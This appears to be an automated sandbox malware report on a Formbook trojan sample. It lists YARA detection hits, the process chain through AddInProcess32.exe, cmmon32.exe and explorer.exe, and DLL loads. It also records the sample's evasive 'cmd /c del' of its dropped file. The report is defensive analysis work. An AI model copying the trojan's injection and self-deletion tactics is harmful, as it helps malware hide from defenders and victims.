          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.000000000376A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.2682408997.000000000C39C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1485081729.000000000362E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2373918036.0000000010F8D000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2666460671.00000000040F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2661042601.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: VFylJFPzqX.exe PID: 7764, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: AddInProcess32.exe PID: 7984, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/9@6/1
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VFylJFPzqX.exe.logJump to behavior
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4084
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe
          Source: VFylJFPzqX.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: VFylJFPzqX.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: VFylJFPzqX.exeReversingLabs: Detection: 73%
          Source: unknownProcess created: C:\Users\user\Desktop\VFylJFPzqX.exe "C:\Users\user\Desktop\VFylJFPzqX.exe"
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4084 -s 3228
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\explorer.exe explorer.exe
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\AddInProcess32.exe"Jump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\Desktop\VFylJFPzqX.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: cmutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
